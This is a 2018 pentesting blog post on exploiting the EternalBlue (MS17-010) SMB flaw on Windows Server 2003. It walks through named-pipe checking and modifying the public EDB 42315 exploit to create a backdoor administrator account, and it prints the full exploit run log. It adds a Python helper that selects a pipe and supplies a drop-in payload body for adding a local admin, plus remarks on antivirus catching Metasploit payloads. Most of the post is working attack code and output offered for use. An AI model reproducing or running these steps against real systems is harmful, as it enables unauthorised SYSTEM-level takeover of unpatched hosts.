Tuesday, October 30, 2018

Exploiting MS17-010 EternalBlue Vulnerability

Here is a quick tip: if you are a pentester who relies on the Metasploit module exploit/windows/smb/ms17_010_psexec, you will often get named-pipe errors when trying to own Windows 2003. If you hit this problem, run checker.py from the MS17-010 repository first; if you have problems running it, make sure mysmb.py from the same repository sits in the same directory as checker.py:

# python checker.py 192.168.102.31
Target OS: Windows Server 2003 R2 3790 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (32 bit)
netlogon: Ok (32 bit)
lsarpc: Ok (32 bit)
browser: Ok (32 bit)

If at least one named pipe is reported "Ok", you can proceed to exploitation. As an alternative to the Metasploit module, you can use the EternalBlue exploit published as EDB-ID 42315 (it also needs mysmb.py next to it). Out of the box it only creates c:\pwned.txt on the target, so you need to modify lines 916-919 (the closeFile line must go too, because the file handle fid2 it references no longer exists once createFile is removed):

916         print('creating file c:\\pwned.txt on the target')
917         tid2 = smbConn.connectTree('C$')
918         fid2 = smbConn.createFile(tid2, '/pwned.txt')
919         smbConn.closeFile(tid2, fid2)

To:

916         print('creating user hacker on target')
917         tid2 = smbConn.connectTree('C$')
918         service_exec(conn, r'cmd /c net user hacker mypassword123 /add')
919         service_exec(conn, r'cmd /c net localgroup administrators hacker /add')

Note that the service path is executed directly by the Service Control Manager, not by a shell, so a single `net user ... && net localgroup ...` string will not chain without `cmd /c`; two service_exec calls, one per command, are the simplest option and match the two services created in the run below. Run the exploit (this run used the user name r00tpgp in its print statement, hence the different message):

# python 42315.py 192.168.102.31 samr
Target OS: Windows Server 2003 R2 3790 Service Pack 1
Using named pipe: samr
Groom packets
attempt controlling next transaction on x64
attempt controlling next transaction on x86
success controlling one transaction
Target is x86
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x87988d48
SESSION: 0xed4615c8
FLINK: 0x5bd48
InData: 0x5ae28
MID: 0xa
TRANS1: 0x58b50
TRANS2: 0x5ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xeecd9ed8
userAndGroupCount: 0x5
userAndGroupsAddr: 0xeecd9f78
overwriting token UserAndGroups
add user r00tpgp on the target
Opening SVCManager on 192.168.102.31.....
Creating service xHnm.....
Starting service xHnm.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service xHnm.....
Opening SVCManager on 192.168.102.31.....
Creating service Vdji.....
Starting service Vdji.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service Vdji.....
Done

You can safely disregard the ERROR_SERVICE_REQUEST_TIMEOUT errors: net.exe is not a real service binary and never reports back to the Service Control Manager, so SCM times out after the command has already run. RDP to the target IP address with your new credentials :-) or execute other commands to get a shell on the system. You should not have any problems exploiting Windows 2003 or below. On Windows 2008 and later, however, you need valid SMB credentials (even a low-privileged account) because anonymous access to the named pipes the exploit relies on is no longer allowed by default. That is the extra layer of complexity Microsoft added to EternalBlue on newer systems.
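As an added example (not part of the MS17-010 scripts or of this post), the two manual steps above as one small Python helper: parse checker.py's output to pick a usable pipe and refuse a patched host, and a drop-in body for smb_pwn() that adds the local admin through the script's own service_exec(), each command wrapped in `cmd /c`. The checker output is the one shown on this page, embedded as a constant; the function names, the pipe-selection rule (first pipe checker reports "Ok") and passing service_exec in as a parameter are my choices, made so the body can be exercised without a target. The code runs under both Python 2 (which 42315.py uses) and Python 3.

```python
"""Helpers for the MS17-010 workflow described above (added example, not
part of checker.py or 42315.py)."""
import re

# Constructed sample: the checker.py output shown earlier on this page.
CHECKER_OUTPUT = """Target OS: Windows Server 2003 R2 3790 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (32 bit)
netlogon: Ok (32 bit)
lsarpc: Ok (32 bit)
browser: Ok (32 bit)
"""


def parse_checker(text):
    """Return (patched, {pipe: status}) parsed from checker.py's stdout."""
    patched = 'The target is not patched' not in text
    pipes = {}
    in_pipes = False
    for line in text.splitlines():
        if line.startswith('=== Testing named pipes'):
            in_pipes = True
            continue
        m = re.match(r'^(\w+): (.+)$', line) if in_pipes else None
        if m:
            pipes[m.group(1)] = m.group(2)
    return patched, pipes


def pick_pipe(text):
    """First pipe checker.py reports 'Ok' (in checker's own order), or None
    when the host is patched or no pipe is reachable."""
    patched, pipes = parse_checker(text)
    if patched:
        return None
    for name, status in pipes.items():
        if status.startswith('Ok'):
            return name
    return None


def adduser_commands(user, password):
    """Commands to run as SYSTEM. SCM starts the service binary path with
    CreateProcess, not a shell, so each command gets its own 'cmd /c'."""
    return [
        'cmd /c net user {0} {1} /add'.format(user, password),
        'cmd /c net localgroup administrators {0} /add'.format(user),
    ]


def smb_pwn_adduser(conn, arch, user, password, service_exec):
    """Drop-in body for smb_pwn(conn, arch) in 42315.py. service_exec is the
    script's own service_exec(conn, cmd), passed in so it can be stubbed.
    Each call ends with ERROR_SERVICE_REQUEST_TIMEOUT from SCM because
    net.exe never calls SetServiceStatus(); the command has run by then.
    Returns the number of commands issued."""
    cmds = adduser_commands(user, password)
    print('adding local admin {0} on the target ({1})'.format(user, arch))
    for cmd in cmds:
        service_exec(conn, cmd)
    return len(cmds)


if __name__ == '__main__':
    # Offline demo on the embedded sample; with a real checker.py run you
    # would feed its stdout to pick_pipe() and pass the result to 42315.py.
    print('usable pipe: {0}'.format(pick_pipe(CHECKER_OUTPUT)))
```

Because pick_pipe() returns None for a patched host, a wrapper around checker.py can stop before touching 42315.py at all; dict ordering in pick_pipe() follows the order checker printed the pipes on Python 3.7+ (earlier interpreters may pick a different "Ok" pipe, which is harmless since any reachable pipe works).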

It has been more than a year since this exploit was made public, but many organizations still fail to patch their systems, which keeps it very relevant for penetration tests and red team engagements.

Note:

Another thing you should know when popping shells with Metasploit: AV scanners easily detect the default payloads. So if you wonder why your meterpreter, reverse/bind TCP shell or cmd exec payloads are not working, blame AV. All the more reason to use alternative exploits.
